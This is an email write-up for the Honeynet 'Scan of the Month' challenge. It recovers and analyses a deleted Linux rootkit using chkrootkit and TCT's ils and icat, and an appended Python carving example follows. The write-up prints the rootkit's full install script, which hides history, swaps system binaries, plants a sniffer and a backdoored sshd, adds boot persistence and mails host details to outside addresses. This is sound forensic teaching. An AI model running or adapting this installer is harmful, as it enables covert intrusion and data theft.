From benjamin.morin@francetelecom.com Tue May 22 22:39:13 2001
Date: Tue, 15 May 2001 18:14:32 +0200
From: Benjamin Morin
Reply-To: benjamin.morin@rd.francetelecom.fr
To: project@honeynet.org
Subject: Scan of the month

Hi,

This is my first attempt at the honeypot challenges. I think these challenges are _really_ good ideas. It took me 5 hours to identify and recover the rootkit, but I guess it might have been done much faster if I had done the right thing at the beginning... ;)

I have been interested in security (and especially intrusion detection) for a year now.

Here are the steps of my analysis (summarized):

1) Find signs of the intrusion.
------------------

I first had a look at .* files in dev/

# cd /dev
# find . -name ".*"
.
./ida/.drag-on
./ida/.. 
# ls ./ida/.drag-on
linsniffer logclear mkxfs s sense sl2 ssh_host_key ssh_random_seed tcp.log
# ls "./ida/.. /"
linsniffer logclear mkxfs s sense sl2 ssh_host_key ssh_random_seed tcp.log

...herrrmm... ".. /" and ".drag-on" are the same except for the file tcp.log, which contains an address from which a connection occurred on the local ftp port:

cr272065-a.wlfdle1.on.wave.home.com => asdf1 [21]

cr272065-a.wlfdle1.on.wave.home.com = 24.43.91.147 ... Anyway, this is not my problem at the moment...

linsniffer is a tool to sniff network packets (http://packetstorm.securify.com/Exploit_Code_Archive/linsniffer.c).
logclear kills linsniffer and restarts it.
tcp.log contains the output of linsniffer.
sense is a perl linsniffer output parser.
sl2 and mkxfs are ELF executable files.

# strings sl2
...
"Usage: %s srcaddr dstaddr low high"
...

Mmmmh... looks like a DoS.

# strings mkxfs
...
/etc/sshd_config
1.2.27
sshd version %s [%s]
...

It looks like an ssh server. Yes, probably, because s is an ssh server configuration file, ssh_host_key is an ssh private key, and ssh_random_seed is another ssh file.

Let's see inetd.conf... Looks a bit strange (only pop3...)

I start chkrootkit (www.chkrootkit.org):

# chkrootkit -r /tmp/honey/root
...
Checking `ifconfig'... INFECTED
Checking `ps'... INFECTED
...
Checking `aliens'...
../root/dev/rpm
../root/dev/last
...

All right... By comparing the sizes of the /bin files on an original RedHat 6.2 box with the ones we have here, I also see that netstat is different. This is not surprising, because /dev/last is a "config file" for this trojaned version of netstat, which can be found in Linux Root Kit (I think). It contains IPs and ports that must be hidden. One of the IPs leads me to the lsv.cl.edu.ro domain, but this is not important for this challenge.

/dev/rpm is the config file for ps. It hides processes.

I have a look at /root/.bash_history. The root downloaded emech-2.8.tar.gz... What is emech? Something IRC-related... I don't mind...

I have a look at the /etc/rc.d/rc.sysinit file... Mmmm... there is a strange line at the end:

/usr/bin/lsattr -t1 -X53 -p

Now I have enough info to try to find a known rootkit that contains these files... I make this request on google: "rootkit sl2 linsniffer"

And... Wow... How strange! Here is the first answer:
http://project.honeynet.org/scans/scan13/som/som13.txt

The author is speaking of a rootkit called xzibit.tar.gz. As a matter of fact, the files are nearly the same as the ones I found in /dev/ida/.drag-on: a file called sshdu seems to have been replaced by the mkxfs file. I learn many things by reading the author's notes and see that this rootkit is really a copy of xzibit.

Something odd: in the xzibit rootkit, there are two files, /dev/caca and /dev/dsx, which are the same as my /dev/last and /dev/rpm. If I have a look at the strings in /bin/netstat and /bin/ps, I can find /dev/caca and /dev/dsx. Not /dev/last and /dev/rpm... I guess these trojaned versions won't hide anything... :)

Anyway... This does not answer the question: "Show step by step how you identify and recover the deleted rootkit from the / partition". I guess the rootkit is a xzibit-like rootkit, but I didn't recover it.
2) Recover the rootkit
--------------

Among google's other answers, I find a link to http://www.porcupine.org/forensics/tct.html. I get tct and compile it. I don't know how it works... I don't have the time to read the docs. I have only read somewhere that the "ils" tool lists the recently deleted files, and "icat" cats them...

# ./ils /tmp/honey/honeynet/honeypot.hda8.dd
class|host|device|start_time
ils|c-ssr-lab02|../../honeynet/honeypot.hda8.dd|989931723
st_ino|st_alloc|st_uid|st_gid|st_mtime|st_atime|st_ctime|st_dtime|st_mode|st_nlink|st_size|st_block0|st_block1
23|f|0|0|984706608|984707090|984707105|984707105|100644|0|520333|307|308
2038|f|1031|100|984707105|984707105|984707105|984707169|40755|0|0|8481|0
2039|f|0|0|1013173693|984707090|984707105|984707105|100755|0|611931|8482|8483
2040|f|0|0|983201398|984707090|984707105|984707105|100644|0|1|9084|0
2041|f|0|0|983588917|984707105|984707105|984707105|100700|0|3713|9085|9086
2042|f|0|0|984707105|984707105|984707105|984707105|100644|0|796|9124|0
... and so on...

I guess the first number must be something like an inode, so I try

# ./icat /tmp/honey/honeynet/honeypot.hda8.dd 2060
# This is ssh server systemwide configuration file.
Port 5
ListenAddress 0.0.0.0
HostKey /dev/ida/.drag-on/ssh_host_key
RandomSeed /dev/ida/.drag-on/ssh_random_seed
ServerKeyBits 768
LoginGraceTime 600
KeyRegenerationInterval 3600
PermitRootLogin no
IgnoreRhosts yes
StrictModes yes
QuietMode yes
X11Forwarding no
...

This seems to be one of the files of the rootkit. So I guess the rootkit's archive must be one of the other files.
This script recovers all the files which have been deleted:

#!/bin/sh
# Carve every inode reported by ils into /tmp/file<inode>.
# Only lines starting with a digit are used, so the ils header lines are skipped.
for i in `./ils /tmp/honey/honeynet/honeypot.hda8.dd | awk -F '|' '/^[0-9]/ {print $1}'`
do
    ./icat /tmp/honey/honeynet/honeypot.hda8.dd $i > /tmp/file$i
done

Now I seek a file that is .tar.gz-ed

# file /tmp/file* | grep gzip
file23: gzip compressed data, deflated, last modified: Sat Mar 3 04:09:06 2001, os: Unix
# tar tzvf file23
drwxr-xr-x 1031/users       0 2001-02-26 21:40:30 last/
-rwxr-xr-x 1031/users  611931 2002-02-08 14:08:13 last/ssh
-rw-r--r-- 1031/users       1 2001-02-26 16:29:58 last/pidfile
-rwx------ 1031/users    3713 2001-03-03 04:08:37 last/install
-rwx------ 1031/users    7165 2001-02-26 16:22:50 last/linsniffer
-rwxr-xr-x 1031/users    1345 1999-09-09 17:57:11 last/cleaner
-rw-r--r-- 1031/users    3278 2001-01-27 16:11:32 last/inetd.conf
-rwxr-xr-x 1031/users      79 2001-02-26 16:28:40 last/lsattr
-rw-r--r-- 1031/users   11407 2001-01-27 16:11:44 last/services
-rwxr-xr-x 1031/users    4060 2001-02-26 16:22:55 last/sense
-rw-r--r-- 1031/users     880 2000-10-22 21:29:44 last/ssh_config
-rw------- 1031/users     540 2000-10-22 21:29:44 last/ssh_host_key
-rw-r--r-- 1031/users     344 2000-10-22 21:29:44 last/ssh_host_key.pub
-rw------- 1031/users     512 2000-10-22 21:29:44 last/ssh_random_seed
-rw-r--r-- 1031/users     688 2001-02-26 16:29:51 last/sshd_config
-rwx------ 1031/users    8268 2001-02-26 16:22:59 last/sl2
-rwxr-xr-x 1031/users    4620 2001-02-26 16:23:10 last/last.cgi
-rwxr-xr-x 1031/users   33280 2001-02-26 16:23:33 last/ps
-rwxr-xr-x 1031/users   35300 2001-02-26 16:23:42 last/netstat
-rwxr-xr-x 1031/users   19840 2001-02-26 16:23:47 last/ifconfig
-rwxr-xr-x 1031/users   53588 2001-02-26 16:23:55 last/top
-rwx------ 1031/users      75 2001-02-26 16:24:03 last/logclear
-rw-r--r-- root/root       708 2001-03-03 04:05:12 last/s
-rwxr-xr-x 1031/users  632066 2001-02-26 15:46:04 last/mkxfs

Well, I guess that's what I am looking for... (I think the unrm command would have given me the same thing, plus the filenames, but I don't know how it works...)
I believe this answers the second question ("What files make up the deleted rootkit?"). The install file is at the end of this mail. I just had to read the script to see which files were changed/created with this rootkit. It does exactly what xzibit did:

- replaces ifconfig, netstat, ps, top
- copies mkxfs to /usr/sbin
- creates /dev/rpm and /dev/last
- copies files into /dev/ida/.drag-on and "/dev/ida/.. "
- replaces /etc/inetd.conf and /etc/services
- replaces lsattr with a script that is started from /etc/rc.d/rc.sysinit and which starts the trojaned ssh server and the sniffer
- installs a cgi script (last.cgi) on the web server
- sends info to last@linuxmail.org and bidi_damm@yahoo.com
- and deletes itself.

The other files from the icat command are the files from the archive and its execution.

Concerning the bonus question and the way it is asked, I am tempted to answer "No, the rootkit was never installed on the system?". But I do not see any other reason to answer this, so I will answer the contrary: Yes, the rootkit was installed on the system, because system files (/etc/services, /etc/inetd.conf, /etc/rc.d/rc.sysinit, etc.) have been altered, as I said before.

That's all I will say at the moment... Just mail me if you think this text needs changes.
Best regards,

Benjamin Morin & France Telecom R&D
benjamin.morin@rd.francetelecom.fr

-----------------------------------------------------
install.sh
-----------------------------------------------------

#!/bin/sh
clear
unset HISTFILE
echo "********* Instalarea Rootkitului A Pornit La Drum *********"
echo "********* Mircea SUGI PULA ********************************"
echo "********* Multumiri La Toti Care M-Au Ajutat **************"
echo "********* Lemme Give You A Tip : **************************"
echo "********* Ignore everything, call your freedom ************"
echo "********* Scream & swear as much as you can ***************"
echo "********* Cuz anyway nobody will hear you and no one will *"
echo "********* Care about you **********************************"
echo
echo
chown root.root *
if [ -f /usr/bin/make ]; then
    echo "Are Make !"
else
    echo "Nu Are Make !"
fi
if [ -f /usr/bin/gcc ]; then
    echo "Are Gcc !"
else
    echo "Nu Are Gcc !"
fi
if [ -f /usr/sbin/sshd/ ]; then
    echo "Are Ssh !"
else
    echo "Nu Are Ssh !"
fi
echo -n "* Inlocuim nestat ... alea alea "
rm -rf /sbin/ifconfig
mv ifconfig /sbin/ifconfig
rm -rf /bin/netstat
mv netstat /bin/netstat
rm -rf /bin/ps
mv ps /bin/ps
rm -rf /usr/bin/top
mv top /usr/bin/top
cp -f mkxfs /usr/sbin/
echo "* Gata..."
echo -n "* Dev... "
echo
echo
touch /dev/rpm >/dev/rpm
echo "3 sl2" >>/dev/rpm
echo "3 sshdu" >>/dev/rpm
echo "3 linsniffer" >>/dev/rpm
echo "3 smurf" >>/dev/rpm
echo "3 slice" >>/dev/rpm
echo "3 mech" >>/dev/rpm
echo "3 muh" >>/dev/rpm
echo "3 bnc" >>/dev/rpm
echo "3 psybnc" >> /dev/rpm
touch /dev/last >/dev/last
echo "1 193.231.139" >>/dev/last
echo "1 213.154.137" >>/dev/last
echo "1 193.254.34" >>/dev/last
echo "3 48744" >>/dev/last
echo "3 3666" >>/dev/last
echo "3 31221" >>/dev/last
echo "3 22546" >>/dev/last
echo "4 48744" >>/dev/last
echo "4 2222" >>/dev/last
echo "* Gata"
echo "* Facem Director...Si Mutam Alea.. "
mkdir -p /dev/ida/.drag-on
mkdir -p /dev/ida/".. "
echo "* Copiem ssh si alea"
cp linsniffer logclear sense sl2 mkxfs s ssh_host_key ssh_random_seed /dev/ida/.drag-on/
cp linsniffer logclear sense sl2 mkxfs s ssh_host_key ssh_random_seed /dev/ida/".. "
rm -rf linsniffer logclear sense sl2 mkxfs s ssh_host_key ssh_random_seed
touch /dev/ida/.drag-on/tcp.log
touch /dev/ida/".. "/tcp.log
cp -f inetd.conf /etc
cp -f services /etc
killall -HUP inetd
echo
echo
echo
echo "* Adaugam In Startup:) ..."
rm -rf /usr/bin/lsattr
echo "/usr/bin/lsattr -t1 -X53 -p" >> /etc/rc.d/rc.sysinit
echo >> /etc/rc.d/rc.sysinit
cp -f lsattr /usr/bin/
chmod 500 /usr/bin/lsattr
chattr +i /usr/bin/lsattr
/usr/bin/lsattr
sleep 1
if [ -d /home/httpd/cgi-bin ]
then
    mv -f last.cgi /home/httpd/cgi-bin/
fi
if [ -d /usr/local/httpd/cgi-bin ]
then
    mv -f last.cgi /usr/local/httpd/cgi-bin/
fi
if [ -d /usr/local/apache/cgi-bin ]
then
    mv -f last.cgi /usr/local/apache/cgi-bin/
fi
if [ -d /www/httpd/cgi-bin ]
then
    mv -f last.cgi /www/httpd/cgi-bin/
fi
if [ -d /www/cgi-bin ]
then
    mv -f last.cgi /www/cgi-bin/
fi
echo "* Luam Informatiile dorite ..."
echo "* Info : $(uname -a)" >> computer
echo "* Hostname : $(hostname -f)" >> computer
echo "* IfConfig : $(/sbin/ifconfig | grep inet)" >> computer
echo "* Uptime : $(uptime)" >> computer
echo "* Cpu Vendor ID : $(cat /proc/cpuinfo|grep vendor_id)" >> computer
echo "* Cpu Model : $(cat /proc/cpuinfo|grep model)" >> computer
echo "* Cpu Speed: $(cat /proc/cpuinfo|grep MHz)" >> computer
echo "* Bogomips: $(cat /proc/cpuinfo|grep bogomips)" >> computer
echo "* Spatiu Liber: $(df -h)" >> computer
echo "* Gata ! Trimitem Mailul ...Asteapta Te Rog "
cat computer | mail -s "placinte" last@linuxmail.org
cat computer | mail -s "roote" bidi_damm@yahoo.com
echo "* Am trimis mailul ... stergem fisierele care nu mai trebuie ."
echo
echo
echo "* G A T A *"
echo
echo "* That Was Nice Last "
cd /
rm -rf last lk.tgz computer lk.tar.gz

-------------------------------------------
Benjamin Morin
France Telecom R&D / Supelec / INSA
benjamin.morin@francetelecom.com
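An added example of the recovery step in section 2, not part of Benjamin Morin's submission and not TCT's own code: the ils record layout and its three header lines are those of the run quoted above, the records and the small archive standing in for the carved inode 23 are constructed, and the functions select the deleted regular-file inodes worth passing to icat (skipping the header lines the mail's loop would have fed to icat) and apply the gzip-magic test that `file` used to find the archive.

```python
import io
import tarfile
# Constructed from the ils run in section 2: the three header lines, then deleted inodes.
ILS_OUTPUT = """\
class|host|device|start_time
ils|c-ssr-lab02|../../honeynet/honeypot.hda8.dd|989931723
st_ino|st_alloc|st_uid|st_gid|st_mtime|st_atime|st_ctime|st_dtime|st_mode|st_nlink|st_size|st_block0|st_block1
23|f|0|0|984706608|984707090|984707105|984707105|100644|0|520333|307|308
2038|f|1031|100|984707105|984707105|984707105|984707169|40755|0|0|8481|0
2040|f|0|0|983201398|984707090|984707105|984707105|100644|0|1|9084|0
2041|f|0|0|983588917|984707105|984707105|984707105|100700|0|3713|9085|9086
"""


def parse_ils(text):
    """Turn ils output into dicts keyed by the st_* column names of its third line."""
    lines = text.splitlines()
    columns = lines[2].split("|")
    records = []
    for line in lines[3:]:
        fields = line.split("|")
        if not fields[0].isdigit():  # header or stray line: the mail's loop fed these to icat
            continue
        rec = dict(zip(columns, fields))
        rec["st_ino"], rec["st_size"] = int(rec["st_ino"]), int(rec["st_size"])
        records.append(rec)
    return records


def inodes_to_carve(records, min_size=2):
    """Deleted (st_alloc f) regular files (st_mode 100xxx) large enough to hold content."""
    return [r["st_ino"] for r in records
            if r["st_alloc"] == "f" and r["st_mode"].startswith("100") and r["st_size"] >= min_size]


def is_gzip(data):
    return data[:2] == b"\x1f\x8b"  # the magic `file` reports as "gzip compressed data"


def list_tgz_members(data):
    """Equivalent of `tar tzvf` on a carved inode: member names of the archive."""
    with tarfile.open(fileobj=io.BytesIO(data), mode="r:gz") as tar:
        return [m.name for m in tar.getmembers()]


def make_sample_tgz():
    """Constructed stand-in for the carved inode 23 (a small last/ tree, not the real archive)."""
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w:gz") as tar:
        for name, payload in (("last/install", b"#!/bin/sh\n"), ("last/s", b"Port 5\n")):
            info = tarfile.TarInfo(name)
            info.size = len(payload)
            tar.addfile(info, io.BytesIO(payload))
    return buf.getvalue()
```

On a real image the bytes passed to is_gzip and list_tgz_members would come from `icat image inode`; directories and the one-byte pidfile are left out of the carve list.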